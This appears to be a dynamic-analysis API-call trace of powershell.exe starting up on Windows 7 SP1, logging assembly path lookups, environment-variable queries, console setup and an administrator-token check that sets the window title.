	[0269.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0269.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0269.682] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0269.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.682] CoTaskMemFree (pv=0x389720) 
	[0269.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0269.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0269.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0269.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0269.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x12d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0269.717] SetErrorMode (uMode=0x1) returned 0x1
	[0269.717] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x12db60 | out: lpFileInformation=0x12db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0269.717] SetErrorMode (uMode=0x1) returned 0x1
	[0272.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0272.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0272.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0272.862] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0272.862] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.862] CoTaskMemFree (pv=0x389720) 
	[0272.865] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0272.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.865] CoTaskMemFree (pv=0x389720) 
	[0272.865] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0272.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.865] CoTaskMemFree (pv=0x389720) 
	[0272.868] CoCreateGuid (in: pguid=0x12df28 | out: pguid=0x12df28*(Data1=0x49abffe8, Data2=0x1827, Data3=0x4ad9, Data4=([0]=0x82, [1]=0x4b, [2]=0x54, [3]=0x99, [4]=0x3b, [5]=0x92, [6]=0x5, [7]=0x33))) returned 0x0
	[0272.870] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0272.870] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.870] CoTaskMemFree (pv=0x389720) 
	[0272.873] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0272.873] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.873] CoTaskMemFree (pv=0x389720) 
	[0272.875] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0272.875] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.875] CoTaskMemFree (pv=0x389720) 
	[0272.880] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0273.504] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x12dbd0 | out: lpConsoleScreenBufferInfo=0x12dbd0) returned 1
	[0273.511] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0273.511] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12dbd0 | out: lpConsoleScreenBufferInfo=0x12dbd0) returned 1
	[0273.513] GetVersionExW (in: lpVersionInformation=0x12db60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12db60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0273.516] GetCurrentProcess () returned 0xffffffffffffffff
	[0273.517] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x12dbf8 | out: TokenHandle=0x12dbf8*=0x320) returned 1
	[0273.522] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12db18 | out: TokenInformation=0x0, ReturnLength=0x12db18) returned 0
	[0273.524] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d7290
	[0273.524] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x2d7290, TokenInformationLength=0x4, ReturnLength=0x12db18 | out: TokenInformation=0x2d7290, ReturnLength=0x12db18) returned 1
	[0273.526] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x12dc78 | out: phNewToken=0x12dc78*=0x31c) returned 1
	[0273.526] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12db18 | out: TokenInformation=0x0, ReturnLength=0x12db18) returned 0
	[0273.526] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d72c0
	[0273.526] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x2d72c0, TokenInformationLength=0x4, ReturnLength=0x12db18 | out: TokenInformation=0x2d72c0, ReturnLength=0x12db18) returned 1
	[0273.527] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2d5e208*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x12dc88 | out: IsMember=0x12dc88) returned 1
	[0273.527] CloseHandle (hObject=0x31c) returned 1
	[0273.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0273.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0273.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0273.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.099] CoTaskMemAlloc (cb=0x804) returned 0x1b903080
	[0274.099] GetConsoleTitleW (in: lpConsoleTitle=0x1b903080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0274.099] CoTaskMemFree (pv=0x1b903080) 
	[0274.121] CoTaskMemAlloc (cb=0x804) returned 0x1b903930
	[0274.121] GetConsoleTitleW (in: lpConsoleTitle=0x1b903930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0274.571] CoTaskMemFree (pv=0x1b903930) 
	[0274.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.574] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0274.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0275.037] SetConsoleCtrlHandler (HandlerRoutine=0x2bd68dc, Add=1) returned 1
	[0275.492] CoCreateGuid (in: pguid=0x12dd70 | out: pguid=0x12dd70*(Data1=0x1566781b, Data2=0xf36e, Data3=0x4555, Data4=([0]=0x80, [1]=0x89, [2]=0x90, [3]=0xbf, [4]=0xb2, [5]=0x19, [6]=0xf3, [7]=0x9f))) returned 0x0
	[0275.493] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0275.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.493] CoTaskMemFree (pv=0x389720) 
	[0275.498] WinSqmIsOptedIn () returned 0x0
	[0275.498] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0275.498] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.498] CoTaskMemFree (pv=0x389720) 
	[0275.499] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0275.499] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.500] CoTaskMemFree (pv=0x389720) 
	[0275.500] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0275.500] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.500] CoTaskMemFree (pv=0x389720) 
	[0275.501] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0275.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.501] CoTaskMemFree (pv=0x389720) 
	[0275.502] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0275.502] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.502] CoTaskMemFree (pv=0x389720) 
	[0275.504] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0275.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.504] CoTaskMemFree (pv=0x389720) 
	[0275.504] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0275.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.505] CoTaskMemFree (pv=0x389720) 
	[0275.505] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0275.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.505] CoTaskMemFree (pv=0x389720) 
	[0275.507] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0275.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.507] CoTaskMemFree (pv=0x389720) 
	[0275.510] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0275.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.510] CoTaskMemFree (pv=0x389720) 
	[0275.510] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0275.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.511] CoTaskMemFree (pv=0x389720) 
	[0275.511] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0275.511] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.511] CoTaskMemFree (pv=0x389720) 
	[0276.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0276.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
